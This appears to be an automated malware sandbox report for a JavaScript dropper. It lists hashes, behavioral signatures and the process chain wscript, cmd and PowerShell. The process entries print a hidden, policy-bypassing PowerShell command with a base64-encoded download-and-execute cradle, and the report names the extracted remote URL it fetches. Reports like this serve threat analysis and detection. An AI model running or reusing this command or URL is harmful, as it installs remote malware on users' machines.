Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
06/01/2024, 22:07
Static task
static1
Behavioral task
behavioral1
Sample
4748877c4e4c31b6755c352c23488b4c.js
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
4748877c4e4c31b6755c352c23488b4c.js
Resource
win10v2004-20231215-en
General
-
Target
4748877c4e4c31b6755c352c23488b4c.js
-
Size
300KB
-
MD5
4748877c4e4c31b6755c352c23488b4c
-
SHA1
0a0cda5921b28c7c95a253d6c94eef40b3226f56
-
SHA256
11827dd777333a8deef8847d36a7070bc1732870e64d5f98cf72efe56dfe9e83
-
SHA512
97ef01d2b9918967a00cb07466904b3da90f0919d1d9074b58d84740dca7ddcc5599d6d87d8366073798b837c4d14eea93916d3f81183f71e6fda8cbe5775071
-
SSDEEP
6144:0Xt/0DvgNSBWaMP92QXcI0yjUTTkSP/C9XSRsOigKuhkNGr:0Xt8DvMSZM1ELyfssxB4r
Malware Config
Extracted
https://jolantagraban.pl/log/57843441668980/dll/assistant.php
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2552 powershell.exe 6 2552 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2552 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2552 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2860 wrote to memory of 3044 2860 wscript.exe 28 PID 2860 wrote to memory of 3044 2860 wscript.exe 28 PID 2860 wrote to memory of 3044 2860 wscript.exe 28 PID 3044 wrote to memory of 2552 3044 cmd.exe 30 PID 3044 wrote to memory of 2552 3044 cmd.exe 30 PID 3044 wrote to memory of 2552 3044 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\4748877c4e4c31b6755c352c23488b4c.js1⤵
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBqAG8AbABhAG4AdABhAGcAcgBhAGIAYQBuAC4AcABsAC8AbABvAGcALwA1ADcAOAA0ADMANAA0ADEANgA2ADgAOQA4ADAALwBkAGwAbAAvAGEAcwBzAGkAcwB0AGEAbgB0AC4AcABoAHAAIgApAA==2⤵
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBqAG8AbABhAG4AdABhAGcAcgBhAGIAYQBuAC4AcABsAC8AbABvAGcALwA1ADcAOAA0ADMANAA0ADEANgA2ADgAOQA4ADAALwBkAGwAbAAvAGEAcwBzAGkAcwB0AGEAbgB0AC4AcABoAHAAIgApAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2552
-
-